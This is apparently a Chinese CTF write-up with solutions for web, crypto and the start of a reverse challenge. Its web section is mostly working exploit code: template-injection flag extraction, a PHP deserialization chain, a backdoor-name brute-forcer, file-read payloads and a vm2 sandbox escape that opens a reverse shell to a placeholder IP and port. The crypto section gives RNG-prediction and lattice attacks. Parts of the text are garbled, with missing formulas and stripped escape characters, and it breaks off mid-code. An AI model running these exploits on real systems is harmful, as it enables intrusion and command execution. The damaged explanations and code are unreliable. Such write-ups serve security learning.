Web
Web-Tera
{% set fla1 = get_env(name="PATH") %}
{% set fla=['f', 'l', 'a', 'g']|join(sep="") %}
{% set fla1 = get_env(name=fla) %}
import requests
flag = ""
for j in range(100):
for i in "0123456789abcdef-{}":
postdata = """{% set f='galf'|reverse %}{% set f1 = get_env(name=f)|reverse %}{% if f1 is starting_with('""" + flag + i + """') %}ok{% endif %}"""
res = requests.post("http://172.10.0.3:8081/", postdata).text
if "ok" in res:
flag += i
print(flag)
breakflag{3c8ce067-4df7-66b2-843a-04c695904159}
Web-web1
<?php
show_source(__FILE__);
error_reporting(0);
class Hacker{
private $exp;
private $cmd;
public function __toString()
{
call_user_func('system', "cat /flag");
}
}
class A
{
public $hacker;
public function __toString()
{
echo $this->hacker->name;
return "";
}
}
class C
{
public $finish;
public function __get($value)
{
$this->finish->hacker();
echo 'nonono';
}
}
class E
{
public $hacker;
public function __invoke($parms1)
{
echo $parms1;
$this->hacker->welcome();
}
}
class H
{
public $username="admin";
public function __destruct()
{
$this->welcome();
}
public function welcome()
{
echo "welcome~ ".$this->username;
}
}
class K
{
public $func;
public function __call($method,$args)
{
call_user_func($this->func,'welcome');
}
}
class R
{
private $method;
private $args;
public function welcome()
{
if ($this->key === true && $this->finish1->name) {
if ($this->finish->finish) {
call_user_func_array($this->method,$this->args);
}
}
}
}
function nonono($a){
$filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|system|eval|flag/i";
return preg_replace($filter,'',$a);
}
$a = $_POST["pop"];
if (isset($a)){
unserialize(nonono($a));
}
?>
<?php
class Hacker{
public $exp;
public $cmd;
}
class H
{
public $username="admin";
}
$tos = new Hacker();
$de = new H();
$de->username = $tos;
echo serialize($de);
Web-web2
<!-- backdoor_[a-f0-9]{16}.php -->
import requests
path = "backdoor_"
for j in range(16):
for i in "0123456789abcde":
postdata = {"filename": "glob://" + path + i + "*"}
fh = requests.post("http://172.10.0.5/",data=postdata).text
if "yesyes" in fh:
path += i
print(path)
break
<?php
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['username'])){
$sandbox = '/var/www/html/sandbox/'.md5("5050f6511ffb64e1914be4ca8b9d585c".$_GET['username']).'/';
mkdir($sandbox);
chdir($sandbox);
if(isset($_GET['title'])&&isset($_GET['data'])){
$data = $_GET['data'];
$title= $_GET['title'];
if (strlen($data)>5||strlen($title)>3){
die("no!no!no!");
}
file_put_contents($sandbox.$title,$data);
if (strlen(file_get_contents($title)) <= 10) {
system('php '.$sandbox.$title);
}
else{
system('rm '.$sandbox.$title);
die("no!no!no!");
}
}
else if (isset($_GET['reset'])) {
system('/bin/rm -rf ' . $sandbox);
}
}
http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=m4x&title[]=1&data[]=%3C?=%20`cat%20/flag`;Web-simple_rpc
http://172.10.0.6:3000/find_rpc?less=h5%7Bcolor:red%7D
http://172.10.0.6:3000/find_rpc?less=h5%7Bcolor:red%7D;@import%20(inline)%20%22@../../../../../../../../../../../../../app/rpc.js%22;rpc.js
var PROTO_PATH = __dirname + '/eval.proto';
const {VM} = require("vm2");
var grpc = require('@grpc/grpc-js');
var protoLoader = require('@grpc/proto-loader');
var packageDefinition = protoLoader.loadSync(
PROTO_PATH,
{keepCase: true,
longs: String,
enums: String,
defaults: true,
oneofs: true
});
var hello_proto = grpc.loadPackageDefinition(packageDefinition).helloworld;
function evalTemplate(call, callback) {
const vm = new VM();
callback(null, {message: vm.run(call.request.template) });
}
function main() {
var server = new grpc.Server();
server.addService(hello_proto.Demo.service, {evalTemplate: evalTemplate});
server.bindAsync('0.0.0.0:8082', grpc.ServerCredentials.createInsecure(), () => {
server.start();
});
}
main()
eval.proto
syntax = "proto3";
package helloworld;
service Demo {
rpc evalTemplate (TemplateRequest) returns (Reply) {}
}
message TemplateRequest {
string template = 1;
}
message Reply {
string message = 1;
}
package.json
{
"name": "confuse",
"version": "1.0.0",
"description": "",
"main": "app.js",
"scripts": {
"test": "node app.js"
},
"author": "",
"license": "ISC",
"dependencies": {
"express": "^4.17.1",
"vm2": "3.9.15",
"acorn": "^8.8.2",
"@grpc/grpc-js": "^1.9.0",
"@grpc/proto-loader": "^0.7.8",
"less": "^4.2.0"
}
err = {};
const handler = {
getPrototypeOf(target) {
(function stack() {
new Error().stack;
stack();
})();
}
};
const proxiedErr = new Proxy(err, handler);
try {
throw proxiedErr;
} catch ({constructor: c}) {
c.constructor('return process')().mainModule.require('child_process').execSync('calc');
}
const grpc = require('@grpc/grpc-js');
const protoLoader = require('@grpc/proto-loader');
var PROTO_PATH = __dirname + '/eval.proto';
var packageDefinition = protoLoader.loadSync(
PROTO_PATH,
{
keepCase: true,
longs: String,
enums: String,
defaults: true,
oneofs: true
}
);
var hello_proto = grpc.loadPackageDefinition(packageDefinition).helloworld;
var client = new hello_proto.Demo('172.10.0.6:8082', grpc.credentials.createInsecure());
var template = `err = {};
const handler = {
getPrototypeOf(target) {
(function stack() {
new Error().stack;
stack();
})();
}
};
const proxiedErr = new Proxy(err, handler);
try {
throw proxiedErr;
} catch ({constructor: c}) {
c.constructor('return process')().mainModule.require('child_process').execSync('bash -c "bash -i >& /dev/tcp/IP/PORT" 0>&1');
}`;
client.evalTemplate({template: template}, function(err, response) {
if (err) {
console.error(err);
return;
}
console.log('服务端的运算结果: ', response.message);
});
Web-Escape
http://172.10.0.5:10000/?username={passhash.__str__.__globals__[app].wsgi_app.__globals__[os].environ[flag]}&password=
Web-HTTP
http://172.10.0.3:8080/swagger-ui/index.html
URL.java:540
if (spec.regionMatches(true, start, "url:", 0, 4)) {
start += 4;
}
if (start < spec.length() && spec.charAt(start) == '#') {
/* we're assuming this is a ref relative to the context URL.
* This means protocols cannot start w/ '#', but we must parse
* ref URL's like: "hello:there" w/ a ':' in them.
*/
aRef=true;
}
http://172.10.0.3:8080/proxy/url?url=url:file:///flag%23a.html
Crypto
SecretShare
X已经暴露了624 * 32以上的随机比特,调RandCrack预测最后的X,然后解线性方程可分解N,最后做RSA解密即可。from randcrack import RandCrack
import libnum
with open('./output.txt', 'r') as f:
data = f.read().split('n')[:-1]
X = []
R = []
for i in range(len(data)):
tmp = [Integer(_) for _ in data[i].split(' ')]
X += [tmp[0]]
R += [tmp[1]]
R += [158171468736013100218170873274656605219228738469715092751861925345310881653082508445746109167302799236685145510095499361526242392251594397820661050281094210672424887670015189702781308615421102937559185479455827148241690888934661637911906309379701856488858180027365752169466863585611322838180758159364570481257]
p = 667548632459029899397299221540978856425474915828934339291333387574324630349258515018972045406265448494845331262999241448002076917383740651362641947814545076390796789402373579283727117618532504865966299599663825771187433223531022829811594806917984414530614469374596457149431218829297339079019894262229453357029
c = 9658009093151541277762773618550582280013680172161026781649630205505443184765264518709081169475689440555639354980432557616120809346519461077355134139495745998317849357705381020225760061125236265304057301286196004542729553944161451832173970613915423841610378207266606500956362098150141825329354727367056070349148059780287916811442861961254066733726576151134458892613951223277692935141880749737598416235307087782001086096114978527447987308876878393763055893556123029990282534497668077854186604106027698257663251502775547705641708624619340185646943640576690633662704397191379303254341343433077302686466850600522990402912
N = 11790604055677230214731474049594783873473779547159534481643303694816346271798870343160061559787963631020684982858033776446193418629055210874285696446209220404060653230407249409973790191858423402504530660556839353260629987853933304089439885784684686555554108157760445567974629355878575105480273451284714281430590737346099023372211403461861104391534461524711472734572409128196536805998116015230502045333769525693468193385557827209520108839913096017750428926467123493650506193757937746017474062985480713594474378324234033232933140389879312722642144536418253323908290256009510135710208223393009237664704631175216240376891
n = 21
randomness = []
for i in range(n-1):
for j in range(1024 // 32):
randomness += [(X[i] >> (32*j)) & 0xffffffff]
rc = RandCrack()
for r in randomness[:624]:
rc.submit(r)
for i in range(len(randomness) - 624):
rc.predict_getrandbits(32)
X += [rc.predict_getrandbits(1024)]
M = matrix(GF(p), n, n)
for i in range(n):
for j in range(n):
M[i, j] = pow(X[j], i, p)
w = vector(GF(p), R)
v = w * M^(-1)
P = Integer(v[0])
Q = N // P
flag = libnum.n2s(int(pow(c, Integer(65537).inverse_mod((P-1)*(Q-1)), N)))
print(flag)
# b'flag{2f43430b-3c31-03ee-0a92-5b24826c015c}'
Neltharion_and_Arthas
encrypt1用CTR模式和相同的密钥key1加密了gift1和flag1,总所周知,用了CTR和相同的密钥加密两个消息,相当于对这两个消息异或了相同的OTP,flag1知道了前面6个字母,所以可以把这6个字母与enc_flag前6字节做异或恢复出前6字节的OTP,再与enc_gift1异或得到gift1的前6字节,结果为I am D。gift1和gift2一样是一个英文句子,然后根据题目名字的Neltharion搜到D应该是Deathwing,然后搜到完整句子gift1 = b'I am Deathwing, the destroyer, the end of all things! Inevitable. Indomitable.'
gift1和enc_gift1异或得到完整的OTP,再与enc_flag异或实现解密。cf1 = bytes.fromhex('c1c78891e30cd4c0aa5ed65c17e8550429c4e640881f9f1d6a56df')
cg1 = bytes.fromhex('bad7dbcff968d7cdbf51da011fe94e176fc8e7528e4dd85d2d5fc20ba69cefb7bfd03152a2874705bd2d857ea75b3216a830215db74772d9b9e9c218271d562694d3642d2917972fdb8c7363d8125730a50824cd8dc7e34cd4fa54be427cca')
flag6 = b'2023: '
m6 = ''
for i in range(6):
ki = flag6[i] ^ cf1[i]
m6 += chr(ki ^ cg1[i])
print(m6)
# https://www.reddit.com/r/wow/comments/855dxm/so_what_are_your_favorite_deathwing_quotes/
gift = b'I am Deathwing'
gift = b'I am Deathwing, the destroyer, the end of all things! Inevitable. Indomitable.'
m = ''
for i in range(len(cf1)):
ki = gift[i] ^ cg1[i]
m += chr(ki ^ cf1[i])
print(gift.decode())
print(m)
# 2023: flag{4ff732dd2b7445fd
gift2,知道缺了4个字节的key2,知道gift2的密文的最后一块和倒数第二块的一半,求作为IV的flag2。key2和最后一块明文,但这里明文最后一块和key2有关,所以可以通过枚举key2的4个字节,判断解出的倒数第二块密文是否符合enc_gift2的格式,来恢复key2(枚举的时候记得加padding)。key2后只需要即可恢复flag2。
from Crypto.Cipher import AES
from Crypto.Util import *
import binascii
import hashlib
import string
import itertools
import libnum
from tqdm import tqdm
def decBlock(key, c):
assert len(c) == 16
aes = AES.new(key, AES.MODE_ECB)
return aes.decrypt(c)
def xor(a, b):
return libnum.n2s(libnum.s2n(a) ^ libnum.s2n(b))
clast = bytes.fromhex('918096cfa3b76d6622914395c7e28eef')
keyx = 'tn*-ix6L*tCa*}i*'
keyx = keyx.replace('*', '%s')
key_len = len(keyx)
for xxxx in tqdm(itertools.product(string.printable, repeat=4), total=100**4):
key = keyx % xxxx
h = binascii.unhexlify(hashlib.sha256(key.encode()).hexdigest())[:11]
msg = b'I tell you this, for when my days have come to an end , you, shall be King.' + h
#padding = bytes((key_len - len(msg) % key_len) * '&', encoding='utf-8')
msg += b'&&&&&&&&&&'
m = []
for i in range(0, len(msg), 16):
m += [msg[i: i+16]]
c = clast
c = xor(decBlock(key.encode(), c), m[-1])
# '**5**c***74***********fee046b4d2'
if not 'fee046b4d2' in c.hex():
continue
print(key, c.hex(), h)
# 5643132/100000000
key2 = b'tn5-ix6L#tCaG}i6'
h = binascii.unhexlify(hashlib.sha256(key2).hexdigest())[:11]
msg = b'I tell you this, for when my days have come to an end , you, shall be King.' + h
msg += b'&&&&&&&&&&'
m = []
for i in range(0, len(msg), 16):
m += [msg[i: i+16]]
#m = m[::-1]
c = bytes.fromhex('918096cfa3b76d6622914395c7e28eef')
for i in range(len(m)):
c = xor(decBlock(key2, c), m[-(i+1)])
flag2 = c
print(flag2)
# b'a3eae82b4c491e0e'
flag = '2023: flag{4ff732dd-2b74-45fd-a3ea-e82b4c491e0e}'
LeakyRSA
leakBits位比特,分解n = p * q,其中leakBits = 262,p和q是nbits = 512位。nbits是,然后假设知道和的高位的话,即可以根据leak计算出的高位,从高位比特到低位比特枚举,然后用以上特性做剪枝。small_roots去解的话,需要设置一个小的epsilon和恰当的beta,还要等很长的时间。n=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
c=71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691
leak=2223117424030234543005449667053988296724455736030907136592525175314696509716321
nbits=512
leakBits = 262
import itertools
def hack(i, pi, e=2):
if i == leakBits:
print(pi)
return [pi]
res = []
for bi in itertools.product((0, 1)):
pj = pi * 2 + bi[0]
qj = (leak >> (leakBits - i - 1)) ^^ pj
nj = pj * 2^(nbits-i-1) * qj * 2^(nbits-i-1)
k = nbits - (i+1)
r = nbits + k + e
test1 = n >> r
test2 = nj >> r
if test1 == test2:
res += hack(i+1, pj, e)
return res
# ph = hack(1, 0b1, e=8)
# print(ph)
ph = 0b10000010000111000101010101100001111010110001001111000001111111000110011011011011101001111010101110110011001111010011000100111100101000000011000101001101100001100001001010001111101100001011001000101111110011010010000010011111011110100000111110001010101
ph = hack(ph.nbits(), ph)
print(ph)
# [3766446804604751716700603557468056141781372537302833297927481351664361621596419, 3766446804604751716700603557468056141781372537302833297927481351664361621596420, 3766446804604751716700603557468056141781372537302833297927481351664361621596421]
ph = hack(1, 0b1, e=8)可以得到以上的ph = 0b1000001...,然后缩小范围后只有三个结果,最后用这三个结果去做CopperSmith。
def solve(n, ph, pl=1, pbits=512):
hbits = ph.nbits()
print(hbits)
lbits = pl.nbits()
PR.<x> = PolynomialRing(Zmod(n))
f = ph * 2^(pbits-hbits) + x * 2^lbits + pl
f = f.monic()
roots = f.small_roots(X=2^(pbits-hbits-lbits+1), beta=0.47, epsilon=0.008)
if roots:
pm = Integer(roots[0])
p = ph * 2^(pbits-hbits) + pm * 2^lbits + pl
if n % p == 0:
q = n // p
return p, q
return None
n = 73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
from tqdm import tqdm
phs = [3766446804604751716700603557468056141781372537302833297927481351664361621596419, 3766446804604751716700603557468056141781372537302833297927481351664361621596420, 3766446804604751716700603557468056141781372537302833297927481351664361621596421]
for ph in phs:
res = solve(n, Integer(ph))
if res != None:
print(res)
p, q = (6814449132912466352143200200256605077873329465758477832056090562012411200107156482645933890997787435093806046493913273252717701817613907418845774345791241, 10833217580503000698385694268032196544400600307706228180481286239545614448110770843300361411809086269809006469621399256214887200838529724133384063799751203)
assert p * q == n
import libnum
c = 71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691
flag = libnum.n2s(int(pow(c, Integer(65537).inverse_mod((p-1)*(q-1)), n)))
print(flag)
# b'flag{6eb67115-38b1-4e75-b3fc-de3a9697e565}'
colorful_matrix
AES的密钥是key1,根本就不需要key2,大坑啊(
key1。import libnum
ns = [38630062416586710341458654419912504176237737247477839749085033080367529539859992076587411537805430366799412095876782912512744262957062106155418341531142309858429218208463637096843365217114990765965110566415965985105403996944993619708417839598461935470469097206342256014086162845948208599334925650727933097059538199199685364793545286980392966271769914201657672004082101110775504946586957241075964270454872257405872181588544468173017149763827540561921126826597515171761064800381983526515300315517818122598179574900255685121991744205071544970, 41522753602903133841910260331594875922287719226997542592715810409935551768308104573333760854332533376702631593490915962706512143045107096658851885513727202513616813054397657610854303071682604806070009002234312854968365250748142324994926715544722158698813288131533399544263105858513134170084625526223987620550110255872688155827773099232631041345207194483609514502522566888883736218471849075697433311580004701384847571029783514418685068903758509270527252444771313048094566344002411364378658592832008194309873599342916391769027015343562030852, 41542983120532762175372001624404625565366126179958909731196555044290633581761361918706298428954501507557598076910710787422049443564800530253137695341299743714514361560156305534490483794181933110893966453220306980682146624294992100948497284459992930850081254114996830645068636306625330524465991656430799359422407117440063911943625477783216502523414967017151717597372146324488526509879620785458016456593044828784565522423332830549325397893426472247197776412026158371655860380929692662547882654137064941217130915364306358205055760044763651406, 42853015443318352230776688785915441259875645365236808434164117288657978345098324019250085686482568413223085548506789311679316323466083886556772338612177680666217592255234589446979456714341877135596118517098603502394776049958587301113539552072352462301070489369653155854389890761241450743607560719433910573462283304103064437843063566946231984094581307498714742271881862348689297267558023093643893310002803310596286441071314219020032740336515363830250477649030557311461077069407775907176409762823453607196260454965048316567154365877848652918, 31152961872836435078296602982779340735140569916125711058616435902653202922218293684857125091648631460215120167354825278469413413558325850576700866199515219603448136082693185200558425103833947831228064760642508443585470729998592994719564254894176473779555436230174300038353978808432410463449170865897259181312953584408177790825688497584119467820716449210429423337019604137134889051973100340798405991782200038835066294194815913887924272593864934325496116821854183293510325217934617021428710898873475027666892706022106386340733691632884942848]
M = matrix(ZZ, 5, 5)
for i in range(1, 5):
M[0, i] = ns[i]
M[i, i] = -ns[0]
M[0, 0] = 2^256
L = M.LLL()
w = L[0]
v = w * M^(-1)
q = [Integer(abs(_)) for _ in v]
q0 = q[0]
p = ns[0] // q0
assert is_prime(p)
print(p)
m = [ns[i] - p * q[i] for i in range(5)]
key1 = libnum.n2s(int(p))[:32]
print(key1)
# 293423658885957174953198318664231534672400520068303593221989900395768107225130267646792968959460384248015583618158947268381852534151783869878808621629530642974652628810907251607210136313789978156955302211733219987661815438401343683
# b'0b5e732a48fc8c6f5ac6366212d2bc59'
即可得36组
即得,可以自行算一下,反正肯定有,然后LLL解出所有的和,然后计算,即可恢复。
key2,但因为非预期所以其实并不需要key2。import libnum
p = 293423658885957174953198318664231534672400520068303593221989900395768107225130267646792968959460384248015583618158947268381852534151783869878808621629530642974652628810907251607210136313789978156955302211733219987661815438401343683
A = [12789809461864875489953273982997537541385904671489556544122095227619591140533414669794423644619127980362623481580128258914287474542792728686579090501397390, 10463950513938701625808784986819665844287315724639315128677227520960105897990256530542006653611594269012930935073966767351788182657861624733138283749460454, 5253244650607533810967862436125419800679723144526973463211784033045021824966560017919956773745212139142517766154626849426827164032731516615725539069585525, 5644589184984504085855423002268477365020278981591337230721358313393863912025011466727192648804002734561676112555123877764178690726130713927642577324443238, 4231732567865883627242742552738439372803539125622706171540910152922080004603138662537022248675968288205781990968838888633816697065257733344028576518431020, 2483388920404524165854675814798022834892112957478917588986471421083048888193527751575039626887367465858751417977246719312923814782809309525841102293919541, 3252353812256192711411255830105475125944842449239880454539397067913664088094160819193268643401968970009466652179043139341471403913410402646923633696154454, 11575010486066232687430367040977113580882826853104996856464797182632266635060724100357205810604915010810884387573114266349621457564659060272935537811111850, 116107444921917032985259963199427176510900273385517435613848456370557161312731449337837406563733552524777525870560544042690403987311424820755256727586807, 5859050133610438843641532306693688255014116940390205022708310454673159702673207152462501010791971695002865650407033762568636006764435795015869726867643634, 5954075553161305677556950650395792531753502207483036473422070018485916621872566706504374038792527687442272405589975343003802956899043321092006127828986114, 4571747544457157571652286537158051402285727327066029382085461714597609990601683125994983291866807816649968826930652068427193317966970789937746419206862747, 7166507561570980603812241332170524724051295937096000768984168029904561160020043035660087151672164814332446644696618077835020463308343415953131944864257266, 4852042788460566411381271873349329096978244586097817622748766708426751073559942708861852208085367014057217116211249133109246735634468823924185525972777655, 11962941918999276757181090570698839032103646409734781047194175833198626142790676141060052011581957980660140931408560130449153056874213033784715711461403345, 10324508881746579337486319574059121005227580732153432145860775835052420139026016902518605634385512021513380467928195663920843022679549517463264144660593354, 13276257094435850052122403884510025189232513948002582716865201271569293297601525601586036713056700716929820641888489806178376555435219630186396004003438962, 6525051273399089095687950615197786094425890004112675057642687348101531212837185750558500720306108976630502328600886080197626115513445112562084719104488315, 12922888505610354933000354792496863801007995464403098763485264334670452387681468617068312646367483171083114539083453125614861357751571161533921864394641576, 9489726784141062031514945333087338495823600723655465328127755755022980083351477888038160719541864899912899592065620071698977397662002448273876711116012763, 10630316198843195148937849513165933809121991192035364160395429088101265852052098101114542104327663563661384303617672183366879116750889320604308038959012109, 12675564142993964272844760955973914547747654087592111324261755301551267959231076883765863344473167582531968290671984039948163579495803204811731286282708940, 11847724105274460405216443356582445218232627275228120716891711887600046501095390733716854871561352002320819466803698088448952127166615410820121973485089326, 5131676593756685549522564504727003861447389891839469018437277330988047271086971907217360711863971849879439418231726349935396008040776952541710218842744018, 8049060452950901277510497437779182190254362319091882684392717180429468875432078713802857488901441344429723298843967365750616860588029426099852763482179470, 2365060249260571713545479629411006471094806409182638354076861269679377537605360223984548798658469783472746989448405310909017645138161178501458084966625559, 7467521246204465304438401242342633361751371318557249418344587207503257890765643838557008735305668588521988487342275527781708126255070883848829062790678347, 5841608816993144092409175658260479687582056537041472535819914412630519543198558564258699185557903902095773598614097026740427138629173672250387442834578787, 3935779917509948624841228665498558015416911059417306651751360048412619176423173794541812556512582747588138532941031730797102738268660078594473168666677171, 1459083415233950534805962555425717865938763752937036513111696179351002303817986848490146888626704327653287774806488952733813718461674376764427084478395399, 6426876689549337938550615491086475536072547585103523407263007393570982327518298678278232288342601754164640081474537962710401178482959474762541185760732929, 5241364650650467046722868257809607948071188801137204831449976666385482519613365369974704486723941517654753205012497273820309153659423928739972270634209996, 6387483223002092292686097811446217867743566298067033295601210265979889577756648605354064672061975949925472022416479935990178719227937307079186916383092053, 170562164015232424518655058158727202269056868720093972639058422975773575660534168774299548952867348396798580779605954510297102765330549642318362861226163, 10004133230245713370426176448219282796530473722412487408402635996842671302539458739305597027107498342509248085998067976408732789438099488867425813748783724, 12325342879747412722323355648741345730921040452129462974449188258885453690169624888480720109964630270938743431623479816739889661554987977051169401841580388, 641543989928732942291347866597230552820621633110802944556141221591498546555080480758772801043509130524233886009444044150447511986129019395067102094826363]
B = [108715652691370707411987210267535348806, 131676833696101475747102644851662113271, 122436706338521558335484593966234623745, 255864866572301552398412638474857375629, 81098761191414480003681301866161112100, 322322463176364397336266169283851913620, 198167679309202772183020662350938553923, 326360662842236388778385468938922853242, 241812832858991643670485138860832357660, 69768236619183466076110136290750715548, 32383134960394164339076842474280712870, 147747232748027508904245311745435517130, 25327826075608705748116808975774398964, 65295332681674581261444632606267440749, 236756211690281667988216748814564193312, 106435149910135092172124474857722935730, 270727089812520941022075406571244846193, 206881193220261276126028739930244917728, 131961838897694897398340205404861333362, 219211823942216355573832791993673934321, 150960424777134558142309786444952807101, 51112048255939343109218372373173385772, 182065623911902509203036774197184164110, 168420344895532090057957641972492853410, 301808673225362418769168353084541667053, 132272458662433671393247350648662880688, 495672626901999558635736361346563007, 182444159345379042372018248514964944782, 144584137563407779776361378564517880036, 338518705859818740467225748906995999694, 205885429741815676881969528495365151019, 233897982464483450790005953366237992668, 279307677123402840425362992920185630901, 133493426228159673166382443820069696429, 316624110847744871475435405969944304329, 187931604382397525131117897387179435812, 220019728924915067987393012581921164417]
def matrix_overview(BB):
for ii in range(BB.dimensions()[0]):
a = ('%02d ' % ii)
for jj in range(BB.dimensions()[1]):
if BB[ii, jj] == 0:
a += ' '
else:
a += 'X'
if BB.dimensions()[0] < 60:
a += ' '
print(a)
n = 37
T1 = 2^528
T2 = 2^400
G = 2^238
H = 2^400
M = matrix(ZZ, 2*n+1, 2*n+1)
for i in range(n-1):
Di = T2 * A[-1].inverse_mod(p) * (A[i] * B[-1] - A[-1] * B[i]) % p
Ei = T1 * A[-1].inverse_mod(p) * A[i] % p
Fi = A[-1].inverse_mod(p) * A[i] % p
M[2*i, 2*i] = - p
M[2*i+1, 2*i] = - T1
M[2*i+1, 2*i+1] = G
M[-1, 2*i] = Di
M[-2, 2*i] = Ei
M[-3, 2*i] = Fi
M[-3, -3] = 1
M[-2, -2] = G
M[-1, -1] = H
matrix_overview(M)
L = M.LLL()
l = L[0]
x0 = (T1*abs(l[2*0+1])//G + T2*B[0] + abs(l[2*0])) * A[0].inverse_mod(p) % p
x1 = (T1*abs(l[2*1+1])//G + T2*B[1] + abs(l[2*1])) * A[1].inverse_mod(p) % p
assert x0 == x1
x = x0
key2 = libnum.n2s(int(x))[:32]
print(key2)
# b'71daf933d8f03cd24fd8596fcf6468b3'
ms和A中泄露了624 * 32以上的随机比特,调RandCrack预测可得iv,然后用key正常解密即可。m = [12610761596859615338377507505797807887151476346999744775108821558273890028891, 13117413857353092802818150671891243460783640002008674612123855586624653019593, 53615229752684072838720322357723519016612611217408795609204017594168753460173, 114925727157331362271459397249756452108949510154527632590097998028667381400721, 111107324092431692605535663730265818421299427508885792571022132823006030649517]
A = [12789809461864875489953273982997537541385904671489556544122095227619591140533414669794423644619127980362623481580128258914287474542792728686579090501397390, 10463950513938701625808784986819665844287315724639315128677227520960105897990256530542006653611594269012930935073966767351788182657861624733138283749460454, 5253244650607533810967862436125419800679723144526973463211784033045021824966560017919956773745212139142517766154626849426827164032731516615725539069585525, 5644589184984504085855423002268477365020278981591337230721358313393863912025011466727192648804002734561676112555123877764178690726130713927642577324443238, 4231732567865883627242742552738439372803539125622706171540910152922080004603138662537022248675968288205781990968838888633816697065257733344028576518431020, 2483388920404524165854675814798022834892112957478917588986471421083048888193527751575039626887367465858751417977246719312923814782809309525841102293919541, 3252353812256192711411255830105475125944842449239880454539397067913664088094160819193268643401968970009466652179043139341471403913410402646923633696154454, 11575010486066232687430367040977113580882826853104996856464797182632266635060724100357205810604915010810884387573114266349621457564659060272935537811111850, 116107444921917032985259963199427176510900273385517435613848456370557161312731449337837406563733552524777525870560544042690403987311424820755256727586807, 5859050133610438843641532306693688255014116940390205022708310454673159702673207152462501010791971695002865650407033762568636006764435795015869726867643634, 5954075553161305677556950650395792531753502207483036473422070018485916621872566706504374038792527687442272405589975343003802956899043321092006127828986114, 4571747544457157571652286537158051402285727327066029382085461714597609990601683125994983291866807816649968826930652068427193317966970789937746419206862747, 7166507561570980603812241332170524724051295937096000768984168029904561160020043035660087151672164814332446644696618077835020463308343415953131944864257266, 4852042788460566411381271873349329096978244586097817622748766708426751073559942708861852208085367014057217116211249133109246735634468823924185525972777655, 11962941918999276757181090570698839032103646409734781047194175833198626142790676141060052011581957980660140931408560130449153056874213033784715711461403345, 10324508881746579337486319574059121005227580732153432145860775835052420139026016902518605634385512021513380467928195663920843022679549517463264144660593354, 13276257094435850052122403884510025189232513948002582716865201271569293297601525601586036713056700716929820641888489806178376555435219630186396004003438962, 6525051273399089095687950615197786094425890004112675057642687348101531212837185750558500720306108976630502328600886080197626115513445112562084719104488315, 12922888505610354933000354792496863801007995464403098763485264334670452387681468617068312646367483171083114539083453125614861357751571161533921864394641576, 9489726784141062031514945333087338495823600723655465328127755755022980083351477888038160719541864899912899592065620071698977397662002448273876711116012763, 10630316198843195148937849513165933809121991192035364160395429088101265852052098101114542104327663563661384303617672183366879116750889320604308038959012109, 12675564142993964272844760955973914547747654087592111324261755301551267959231076883765863344473167582531968290671984039948163579495803204811731286282708940, 11847724105274460405216443356582445218232627275228120716891711887600046501095390733716854871561352002320819466803698088448952127166615410820121973485089326, 5131676593756685549522564504727003861447389891839469018437277330988047271086971907217360711863971849879439418231726349935396008040776952541710218842744018, 8049060452950901277510497437779182190254362319091882684392717180429468875432078713802857488901441344429723298843967365750616860588029426099852763482179470, 2365060249260571713545479629411006471094806409182638354076861269679377537605360223984548798658469783472746989448405310909017645138161178501458084966625559, 7467521246204465304438401242342633361751371318557249418344587207503257890765643838557008735305668588521988487342275527781708126255070883848829062790678347, 5841608816993144092409175658260479687582056537041472535819914412630519543198558564258699185557903902095773598614097026740427138629173672250387442834578787, 3935779917509948624841228665498558015416911059417306651751360048412619176423173794541812556512582747588138532941031730797102738268660078594473168666677171, 1459083415233950534805962555425717865938763752937036513111696179351002303817986848490146888626704327653287774806488952733813718461674376764427084478395399, 6426876689549337938550615491086475536072547585103523407263007393570982327518298678278232288342601754164640081474537962710401178482959474762541185760732929, 5241364650650467046722868257809607948071188801137204831449976666385482519613365369974704486723941517654753205012497273820309153659423928739972270634209996, 6387483223002092292686097811446217867743566298067033295601210265979889577756648605354064672061975949925472022416479935990178719227937307079186916383092053, 170562164015232424518655058158727202269056868720093972639058422975773575660534168774299548952867348396798580779605954510297102765330549642318362861226163, 10004133230245713370426176448219282796530473722412487408402635996842671302539458739305597027107498342509248085998067976408732789438099488867425813748783724, 12325342879747412722323355648741345730921040452129462974449188258885453690169624888480720109964630270938743431623479816739889661554987977051169401841580388, 641543989928732942291347866597230552820621633110802944556141221591498546555080480758772801043509130524233886009444044150447511986129019395067102094826363]
from Crypto.Util.number import *
from Crypto.Cipher import AES
from randcrack import RandCrack
import libnum
key1 = b'0b5e732a48fc8c6f5ac6366212d2bc59'
key2 = b'71daf933d8f03cd24fd8596fcf6468b3'
enc = b'cTmkMbxfcx05|x1dxc7x13xbaSexe0xbdxc0xd9xa3x8cwox82yN[B&x80xd7KPwQ`x9cxbf<yx8ex8ax97exa074xb2'
rc = RandCrack()
randomness = []
for mi in m:
for j in range(256 // 32):
randomness += [(mi >> (32*j)) & 0xffffffff]
for ai in A:
for j in range(512 // 32):
randomness += [(ai >> (32*j)) & 0xffffffff]
for r in randomness[:624]:
rc.submit(r)
for i in range(624, len(randomness)):
assert randomness[i] == rc.predict_getrandbits(32)
def xor(a, b):
return bytes([a[i%len(a)] ^ b[i%len(b)] for i in range(max(len(a), len(b)))])
# key = xor(key1,key2)
key = key1
iv = long_to_bytes(rc.predict_getrandbits(128))
aes = AES.new(key,AES.MODE_CBC,iv)
print(aes.decrypt(enc))
# b'flag{86baa4ed-5ec7-11ee-ae14-ac1203ab14da}x06x06x06x06x06x06'
Reverse
BabyRe
用题目文件同平台的编译器获取该种子产生的随机数:
#include <stdio.h>
#include <stdlib.h>
int main() {
srand(0xDEADC0DE);
for (int i = 0; i < 32 * 6; i++) {
